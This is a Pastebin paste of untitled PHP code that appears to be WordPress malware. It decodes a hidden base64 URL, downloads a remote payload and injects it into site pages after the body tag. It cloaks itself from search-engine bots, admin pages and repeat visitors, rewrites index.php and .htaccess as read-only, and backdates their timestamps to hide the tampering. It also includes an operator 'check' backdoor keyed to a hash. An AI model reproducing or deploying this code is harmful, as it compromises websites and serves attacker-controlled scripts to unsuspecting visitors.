SHARE
TWEET

Untitled

rom4eg9996669 May 15th, 2015 356 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ///istart
  2.  
  3. function my_time($dir) {
  4.     foreach (glob($dir . '/wp-*.php') as $f) {
  5.         $times[] = filemtime($f);
  6.     }
  7.     $max = 1;
  8.     for ($i = 0; $i < count($times) - 1; $i++) {
  9.         $k = 1;
  10.         for ($j = $i + 1; $j < count($times); $j++) {
  11.             if ($times[$i] == $times[$j]) {
  12.                 $k++;
  13.                 if ($k > $max) {
  14.                     $max = $k;
  15.                     $time = $times[$i];
  16.                 }
  17.             }
  18.         }
  19.     }
  20.     return $time;
  21. }
  22.  
  23. function my_correct($dir) {
  24.     $time = 0;
  25.     $path = $dir . '/index.php';
  26.     $content = base64_decode('PD9waHAKLyoqCiAqIEZyb250IHRvIHRoZSBXb3JkUHJlc3MgYXBwbGljYXRpb24uIFRoaXMgZmlsZSBkb2Vzbid0IGRvIGFueXRoaW5nLCBidXQgbG9hZHMKICogd3AtYmxvZy1oZWFkZXIucGhwIHdoaWNoIGRvZXMgYW5kIHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGhlbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoJ1dQX1VTRV9USEVNRVMnLCB0cnVlKTsKCi8qKiBMb2FkcyB0aGUgV29yZFByZXNzIEVudmlyb25tZW50IGFuZCBUZW1wbGF0ZSAqLwpyZXF1aXJlKCBkaXJuYW1lKCBfX0ZJTEVfXyApIC4gJy93cC1ibG9nLWhlYWRlci5waHAnICk7Cg==');
  27.     if (file_get_contents($path) != $content) {
  28.         chmod($path, 0644);
  29.         file_put_contents($path, $content);
  30.         chmod($path, 0444);
  31.         $time = my_time($dir);
  32.         touch($path, $time);
  33.     }
  34.  
  35.     $path = $dir . '/.htaccess';
  36.     $content = base64_decode('IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==');
  37.     if (file_exists($path) AND file_get_contents($path) != $content) {
  38.         chmod($path, 0644);
  39.         file_put_contents($path, $content);
  40.         chmod($path, 0444);
  41.         if (!$time) {
  42.             $time = my_time($dir);
  43.         }
  44.         touch($path, $time);
  45.     }
  46. }
  47.  
  48. my_correct(dirname(__FILE__) . '/..');
  49.  
  50. function request_url_data($url) {
  51.     $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
  52.     if (function_exists('curl_init')) {
  53.         $ch = curl_init();
  54.         curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  55.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  56.         curl_setopt($ch, CURLOPT_URL, $url);
  57.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  58.         curl_setopt($ch, CURLOPT_HTTPHEADER, array(
  59.             'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
  60.             'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
  61.             'Referer: ' . $site_url,
  62.         ));
  63.         $response = trim(curl_exec($ch));
  64.     } elseif (function_exists('fsockopen')) {
  65.         $m = parse_url($url);
  66.         if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
  67.             fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
  68.                 'Host: ' . $m['host'] . "\r\n" .
  69.                 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
  70.                 'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
  71.                     'Referer: ' . $site_url . "\r\n" .
  72.                     'Connection: Close' . "\r\n\r\n");
  73.             $response = '';
  74.             while (!feof($fp)) {
  75.                 $response .= fgets($fp, 1024);
  76.             }
  77.             list($headers, $response) = explode("\r\n\r\n", $response);
  78.             fclose($fp);
  79.         }
  80.     } else {
  81.         $response = 'curl_init and fsockopen disabled';
  82.     }
  83.     return $response;
  84. }
  85.  
  86. error_reporting(0);
  87. $_passssword = '3e2b7254489da058817288025e2147e9';
  88. unset($_passssword);
  89.  
  90. if (function_exists("add_action")) {
  91.     add_action('wp_head', 'add_2head');
  92.     add_action('wp_footer', 'add_2footer');
  93. }
  94.  
  95. function add_2head() {
  96.     ob_start();
  97. }
  98.  
  99. function add_2footer() {
  100.     $check = false;
  101.     $check_data = "";
  102.     if (!empty($_GET['check']) AND $_GET['check'] == '3e2b7254489da058817288025e2147e9') {
  103.         $check = true;
  104.         $check_data = ('<!--checker_start ');
  105.         $check_data .= (substr(request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'), 0, 100));
  106.         $check_data .= (' checker_end-->');
  107.     }
  108.  
  109.     if (!$check) {
  110.         if (!@$_SERVER['HTTP_USER_AGENT'] OR (substr($_SERVER['REMOTE_ADDR'], 0, 6) == '74.125') OR preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT']))
  111.             return;
  112.  
  113.         $cookie_name = 'PHP_SESSION_PHP';
  114.         if (isset($_COOKIE[$cookie_name]))
  115.             return;
  116.  
  117.         foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
  118.             if (preg_match($regex, $_SERVER['REQUEST_URI']))
  119.                 return;
  120.         }
  121.     }
  122.  
  123.     $buffer = ob_get_clean();
  124.     ob_start();
  125.     $regexp = '/<body[^>]*>/is';
  126.     if (preg_match($regexp, $buffer, $m)) {
  127.         $body = $m[0];
  128.         $url = base64_decode('aHR0cDovL25pa2FyYWd1YS5zbHlpcC5jb20vYmxvZy8/YmY0eiZ1dG1fc291cmNlPTc4NzY2OjExMzQyNzoxODg=');
  129.         if (($code = request_url_data($url)) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
  130.             $body .=  '<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000); document.cookie="' . $cookie_name . '=' . mt_rand(1, 1024) . '; path=/; expires="+date.toUTCString();</script>';
  131.             $body .= base64_decode($m[0]);
  132.         }
  133.         $body .= $check_data;
  134.  
  135.         $buffer = preg_replace($regexp, $body, $buffer);
  136.     }
  137.     echo $buffer;
  138.     ob_flush();
  139. }//iend
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top